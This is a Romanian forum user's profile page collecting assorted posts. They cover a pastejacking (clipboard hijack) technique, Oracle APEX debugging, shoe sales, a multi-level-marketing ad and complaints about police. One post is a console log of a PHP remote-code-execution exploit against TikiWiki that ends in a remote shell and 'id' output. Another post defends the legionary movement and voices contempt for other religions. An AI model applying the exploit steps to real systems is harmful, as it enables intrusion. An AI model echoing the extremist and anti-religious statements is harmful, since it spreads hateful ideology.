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hozarares last won the day on August 28 2010

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About hozarares

  • Birthday 01/01/1980


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    high risk security advisor

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  1. If a user attempts to copy the text with keyboard shortcuts, i.e. ctrl+c or command+c, an 800ms timer gets set that will override the user's clipboard with malicious code. echo "not evil" Sursa : https://github.com/dxa4481/Pastejacking
  2. Nenea TiK0de si apologia stirilor gen, " orice numa` sa fie", marca tembelilor de la tampenii de cluj, pardon, ?tiri de Cluj - Informa?ii locale non-stop Cel mai faimos hacker din România spune cum s? î?i securizezi mail-ul VIDEO - National/International - ?tiri de Cluj http://stirileprotv.ro/lbin/video_embed.php?media_id=61327758
  3. @THRUSTMASTER Nu, nu e logic sa te "cheme" la nus` ce audieri, telefonic, ca nu`s hotu` de pe strada.Cu citatie...asa zice legea ! @ripoff Nu am dat date personale despre mine, de niciun fel. Exceptie face doar IP`ul fix, care prin adresa face legatura directa cu abonamentul telefonului mobil. Am vb cu providerul meu de net, o firma mica si ei mi`au spus ca doar daca le sunt solicitate date despre un client in baza legii si al unui act semnat de un judecator (nu procuror), pot oferi date confidentiale (IP, adresa, telefon)
  4. Cum isi face Politia Municipiului Cluj-Napoca treaba pe baza " de repede ". In urma cu 6 saptamani am facut o sesizare catre Inspectoratul General al Politiei Romane, catre BCR si catre ALTEX, in urma unui mesaj text primit pe telefonul mobil, in legatura cu un potential castig fabulos. Era unul dintre miile de mesaje SMS pentru fraieri. In consecinta am depus reclamatie prin intermediul email`urilor puse la dispozitie pe paginile oficiale ale institutiilor respective. Am primit raspuns in cateva ore de la BCR si de la Politia Romana dupa 4 saptamani (atat telefonic cat si prin email). Ma sunase un anume "`lent Xulescu" care imi da ordin sa ma prezint de urgenta la Politia Cluj, ba mai mult, imi trimite si mesaje. Ce este curios, e faptul ca eu am facut sesizarea online catre Inspectoratul General Al Politiei Romane si ei m-au chemat la " interviu" , la Politia Municipiului Cluj-Napoca. Asta inseamna ca IP`urile sunt urmarite fara a fi nevoie de ACTA, chiar daca unii nu cred ! Nu am avut timp sa ma prezint nicaieri si am primit urmatoarea citatie prin email in care se poate vedea clar dezinteresul fata de mishmashuri, ci doar punerea in practica birocratiei:
  5. Surprize, surprize ... Asa cum te vad in fiecare zi: Documentar despre autonomie teritoriala
  6. What is APEX? [From Oracle.com] Oracle Application Express (Oracle APEX) is a rapid web application development tool for the Oracle database. Using only a web browser and limited programming experience, you can develop and deploy professional applications that are both fast and secure. Oracle APEX is a fully supported, no cost option of the Oracle database. Infrastructure This blog is developed in APEX with an ORACLE XE database. The Oracle instance is running on a dedicated servers hosted in the USA and has the following specs: AMD Dual Core 2x2,2 GHz, 2 GB DDR2 RAM and a 250 GB drive. We use Linux Centos 5 64 bit version operating system. We are using the Embedded PLSQL Gateway (EPG) and Apache HTTP server. Exemplu: usor de implementat ! ############################################################## Changing the PlsqlErrorStyle atttribute for EPG ############################################################## I've been having some trouble with my Oracle XE + Apex 4.0 + EPG instance lately and the only way I could debug the error was by switching the way EPG produces the error messages in the web browser. By default, EPG (Embedded PLSQL Gateway) outputs the web page rendering error messages in ApacheStyle, meaning that when a page results in error, the message displayed in the browser is similar to that output by an Apache HTTP Server (even if you're not using one): 404 Not found The requested URL was not found on this server The way to change the error message style for EPG is by executing as SYS: exec dbms_epg.set_dad_attribute(‘APEX’, ‘error-style’, ‘DebugStyle’); The this parameter, PlsqlErrorStyle has the following values: ApacheStyle, ModplsqlStyle, DebugStyle After executing the procedure above, the error message will be displayed as: Mon, 13 Feb 2012 04:25:05 GMT ORA-04031: unable to allocate 40972 bytes of shared memory ("large pool","unknown object","koh-kghu sessi","pl/sql vc2") DAD name: blog PROCEDURE : f URL : http://XDB HTTP Server:8080/blog/f?p=100:1:1606755547143296::::P1_ARTICLE:2420 PARAMETERS : =========== p: 100:1:1606755547143296::::P1_ARTICLE:2420 ENVIRONMENT: ============ PLSQL_GATEWAY=WebDb GATEWAY_IVERSION=2 SERVER_SOFTWARE=Oracle Embedded PL/SQL Gateway/ GATEWAY_INTERFACE=CGI/1.1 SERVER_PORT=8080 SERVER_NAME=XDB HTTP Server REQUEST_METHOD=GET QUERY_STRING=p=100:1:1606755547143296::::P1_ARTICLE:2420 PATH_INFO=/f SCRIPT_NAME=/blog REMOTE_HOST= REMOTE_ADDR= SERVER_PROTOCOL=HTTP/1.1 REQUEST_PROTOCOL=tcp REMOTE_USER=********* ORACLE_SSO_USER= OSSO_IDLE_TIMEOUT_EXCEEDED= OSSO_USER_GUID= HTTP_CONTENT_LENGTH=0 HTTP_CONTENT_TYPE= HTTP_USER_AGENT=Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.46 Safari/535.11 HTTP_HOST=localhost:8080 HTTP_ACCEPT=text/html HTTP_ACCEPT_ENCODING=gzip HTTP_ACCEPT_LANGUAGE=nl HTTP_ACCEPT_CHARSET=ISO-8859-1 HTTP_COOKIE= HTTP_IF_MODIFIED_SINCE= HTTP_REFERER=http://www.apexninjas.com/blog/f?p=100:1:1200241378811897::::P1_ARTICLE: HTTP_SOAPACTION= HTTP_ORACLE_ECID= HTTP_ORACLE_CACHE_VERSION= HTTP_AUTHORIZATION= WEB_AUTHENT_PREFIX= DAD_NAME=blog DOC_ACCESS_PATH=docs DOCUMENT_TABLE=wwv_flow_file_objects$ PATH_ALIAS=rest REQUEST_CHARSET=AL32UTF8 REQUEST_IANA_CHARSET=UTF-8 SCRIPT_PREFIX= HTTP_IF_MATCH= HTTP_CACHE_CONTROL= SOAP_BODY= HTTP_X_ORACLE_DEVICE_CLASS= HTTP_X_ORACLE_DEVICE_ORIENTATION= HTTP_X_ORACLE_DEVICE_MAXDOCSIZE= HTTP_X_ORACLE_DEVICE= HTTP_X_ORACLE_ORIG_ACCEPT= HTTP_X_ORACLE_ORIG_USER_AGENT= HTTP_X_ORACLE_USER_LOCALE= HTTP_X_ORACLE_USER_NAME= HTTP_X_ORACLE_USER_DISPLAYNAME= HTTP_X_ORACLE_USER_USERKIND= HTTP_X_ORACLE_USER_AUTHKIND= HTTP_X_ORACLE_USER_DEVICEID= HTTP_X_ORACLE_USER_LOCATION_ADDRESSLINE1= HTTP_X_ORACLE_USER_LOCATION_ADDRESSLINE2= HTTP_X_ORACLE_USER_LOCATION_ADDRESSLASTLINE= HTTP_X_ORACLE_USER_LOCATION_BLOCK= HTTP_X_ORACLE_USER_LOCATION_CITY= HTTP_X_ORACLE_USER_LOCATION_COMPANYNAME= HTTP_X_ORACLE_USER_LOCATION_COUNTY= HTTP_X_ORACLE_USER_LOCATION_STATE= HTTP_X_ORACLE_USER_LOCATION_POSTALCODE= HTTP_X_ORACLE_USER_LOCATION_POSTALCODEEXT= HTTP_X_ORACLE_USER_LOCATION_COUNTRY= HTTP_X_ORACLE_USER_LOCATION_TYPE= HTTP_X_ORACLE_USER_LOCATION_X= HTTP_X_ORACLE_USER_LOCATION_Y= HTTP_X_ORACLE_SERVICE_HOME_URL= HTTP_X_ORACLE_SERVICE_PARENT_URL= HTTP_X_ORACLE_HOME_URL= HTTP_X_ORACLE_MODULE_CALLBACK_URL= HTTP_X_ORACLE_MODULE_CALLBACK_LABEL= HTTP_X_ORACLE_CACHE_USER=(null) HTTP_X_ORACLE_CACHE_SUBID= HTTP_X_ORACLE_CACHE_AUTH= HTTP_X_ORACLE_CACHE_DEVICE= HTTP_X_ORACLE_CACHE_LANG= HTTP_X_ORACLE_CACHE_ENCRYPT= HTTP_X_ORACLE_ASSERT_USER= Sursa:http://www.apexninjas.com/blog/f?p=100:1:1202975706803231:::::
  7. Sursa..aia de gugal.. Chromium Blog: Pwnium: rewards for exploits
  8. Marimi cuprinse intre nr. 38 si 42 Pretul pentru Nike Lunarswift este de 380 Ron. Pretul pentru Nike Air Ignite este de 400 Ron. Pretul pentru Nike Shox NZ este de 377 Ron. Produsele sunt aduse din import (Europa) si nicidecum nu sunt fabricate la Suceava, Chisinau, China, Turcia, etc. si sunt noi-noute. Livrare personala, maxim 2 ore in Cluj-Napoca si Posta Romana gratuit pentru alte orase din Romania la comenzi de minim 2 perechi.
  9. Pentru prima data in Romania, sistemul de Shopping Network care a cucerit Europa Centrala si de Est. Castiga bani cu Shopping Center Romania. Castigi cheltuind ! Inscrierea este GRATUITA, fara nici o obligatie. PRIMUL Seminar Informativ,este maine, marti 26.10.2010, orele 18:00 la Hotel Napoca din mun. Cluj-Napoca. Pentru Info si Inregistrari http://www.SCNetRomania.com
  10. Io prefer Napolact sau iaurt facut de batranii de la tara !!!
  11. ...treaba asta e mult prea important? ?i sunt convins c? nimeni nu se va sup?ra – mai toat? lumea cump?r? vestitele iaurturi “probiotice” de când capitalismul s?lbatic ni le-a adus în magazine, crezând c?-?i fac un bine s?n?t??ii. În plus copiilor le plac reclamele hazoase ?i gustul lor dulceag, cu fel de fel de arome, naturale evident! Citeste mai departe AICI
  12. hozarares


    PayPal cam fu.te meciu` cu conturile din Romania.Acum ai bani acum nu ai pe motiv ca ai facut nus` ce .... sa`i frec ....
  13. $ ./exploit.py -h http://t.testsystem/ PHP xxx() Remote Code Execution Exploit (TikiWiki Version) Copyright © 2010 Stefan Esser/SektionEins GmbH *** DO NOT DISTRIBUTE *** [+] Connecting to determine wordsize [+] Wordsize is 32 bit [+] Connecting to determine PHP 5.2.x vs. PHP 5.3.x [+] PHP version is 5.3.x [+] Connecting to determine XXX version [+] PHP version >= 5.3.2 [+] Determining endianess of system [+] System is little endian [+] Leaking address of std_object_handlers [+] Found std_object_handlers address to be 0xb76e84a0 [+] Leaking std_object_handlers [+] Retrieved std_object_handlers (0xb75b5c60, 0xb75b6230, 0xb75b2300, 0xb75b4c70, 0xb75b52f0, 0xb75b3fc0, 0xb75b42b0, 0xb75b4430, 0x00000000, 0x00000000, 0xb75b3c60, 0xb75b4a40, 0xb75b57a0, 0xb75b4170, 0xb75b27d0, 0xb75b4f00, 0x00000000, 0xb75b28a0, 0xb75b27a0, 0xb75b2af0, 0xb75b2830, 0xb75b46b0, 0x00000000, 0x00000000, 0xb75b2be0) [+] Optimized to 0xb74008f0 [+] Scanning for executable header [+] ELF header found at 0xb73ab000 [+] Retrieving and parsing ELF header [+] Retrieving program headers [+] Retrieving ELF string table [+] Looking up ELF symbol: executor_globals [+] Found executor_globals at 0xb76fe280 [+] Looking up ELF symbol: php_execute_script [+] Found php_execute_script at 0xb75386c0 [+] Looking up ELF symbol: zend_eval_string [+] Found zend_eval_string at 0xb7586580 [+] Searching JMPBUF in executor_globals [+] Found JMPBUF at 0xbfcc64b4 [+] Attempt to crack JMPBUF [+] Determined stored EIP value 0xb753875a from pattern match [+] Calculated XORER 0x68ab06ea [+] Unmangled stored ESP is 0xbfcc5470 [+] Checking memory infront of JMPBUF for overwriting possibilities [+] Found 0x28 at 0xbfcc6498 (0x3e4) using it as overwrite trampoline [+] Returning into PHP... Spawning a shell at port 4444 ... $ nc t.testsystem 4444 Welcome to the PHPShell 5/22/2010 1:27 am system("uname -a"); Linux fedora13x86 #1 SMP Thu May 13 05:38:26 UTC 2010 i686 i686 i386 GNU/Linux system("id"); uid=48(apache) gid=484(apache) groups=484(apache) context=unconfined_u:system_r:httpd_t:s0 ...
  14. Din ce scrii tu, astepti ca altii sa`ti faca treaba.Ia atitudine si schimbarea o faci chiar tu. Bai baiatu`, idealul legionarist, abia reinvie dupa 70 ani (si nu fac parte din ND ), iar in anii `30 nu exista termen de comunism in Romania ci doar de bolsevism care avea alte intelesuri la acea vreme. Ca ma pis pe celelalte religii? Da..cu cea mai mare placere. Am fost Botezat ortodox si stiu ca nu`i crestineste faptul ca MA PIS pe celelalte religii. Nu le accept in jurul meu; le consider pagane. Extermism ( te citez ):"urm?resc prin m?suri violente sau radicale s? impun? programul lor" . Nu am incalcat niciodata legea prin "actiunile" mele iar ND de la infiintarea sa, niciatat !!! CZC niciodata nu a dus o politica de extremism in anii `30. Mai degraba a facut`o Iorga si Calinescu.Apoi se stie clar ca ce a urmat a fost datorita tradarii lor Nu tre` sa faci parte din ND ca sa fi legionar.
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